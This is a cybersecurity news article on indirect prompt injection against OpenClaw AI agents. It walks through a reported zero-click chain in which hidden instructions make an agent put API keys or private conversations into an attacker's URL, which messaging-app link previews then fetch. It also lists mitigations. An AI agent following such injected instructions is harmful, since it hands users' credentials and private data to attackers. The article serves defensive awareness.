OpenClaw AI Agents Leaking Sensitive Data in Indirect Prompt Injection Attacks

The core issue is not just confusing the AI model; it is manipulating the agent to steal sensitive information without requiring any user interaction. The most alarming demonstration comes from security firm PromptArmor.

They revealed how an attacker can force an OpenClaw agent to leak data using a technique called indirect prompt injection combined with messaging app features.

0-Click Attack Chain

• An attacker hides malicious instructions inside content that the AI agent is expected to read.
• The agent processes the instructions and generates a URL controlled by the attacker.
• The agent appends sensitive data, such as API keys or private conversations, into the URL’s query parameters.
• The agent sends the malicious link back to the user via messaging platforms such as Telegram or Discord.
• Before the user even clicks the link, the messaging app automatically generates a link preview, silently fetching the URL and handing the sensitive data directly to the attacker.

Because the messaging app’s auto-preview feature automatically triggers an outbound HTTP request, this creates a dangerous “no-click” attack. The agent’s response itself becomes the exfiltration event.

According to CNCERT, OpenClaw’s default security posture poses significant enterprise risk by allowing agents to browse, execute tasks, or interact with local files.

They categorized threats into four main areas: indirect prompt injection via external data, accidental destructive actions, malicious third-party activities, and the exploitation of known product vulnerabilities.

OpenClaw is highly useful because it can do real work, but this autonomy makes compromises much more damaging.

• Messaging integrations where auto-preview behaviors create seamless pathways for data theft.
• Host and container access that allows prompt manipulation to translate into real-world system actions.
• A skills ecosystem where unvetted or malicious extensions can drastically widen the attack surface.
• Proximity to stored secrets, as agents often operate near operational credentials and tokens.

As OpenAI recently highlighted, once an agent can retrieve external information and act autonomously, developers must assume that untrusted content will attempt to manipulate the system.

Invaders reports that security teams should treat this issue as an architectural flaw rather than a simple AI bug. To protect deployments, organizations should implement the following steps:

Disable auto-preview features in Telegram, Discord, Slack, and other channels where AI agents generate URLs.

• Isolate OpenClaw runtimes inside tightly controlled containers and keep default management ports off the public internet.
• Restrict unnecessary file system access and keep credentials out of plaintext configuration files.
• Install agent skills only from trusted sources and manually review third-party code before enabling it.
• Set up network monitoring to alert on agent-generated links pointing to unfamiliar domains or unexpected DNS lookups.

Ultimately, the most important question for security teams is no longer whether an AI model can be manipulated, but rather what a manipulated agent is silently capable of doing next.

Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

The post OpenClaw AI Agents Leaking Sensitive Data in Indirect Prompt Injection Attacks appeared first on Cyber Security News.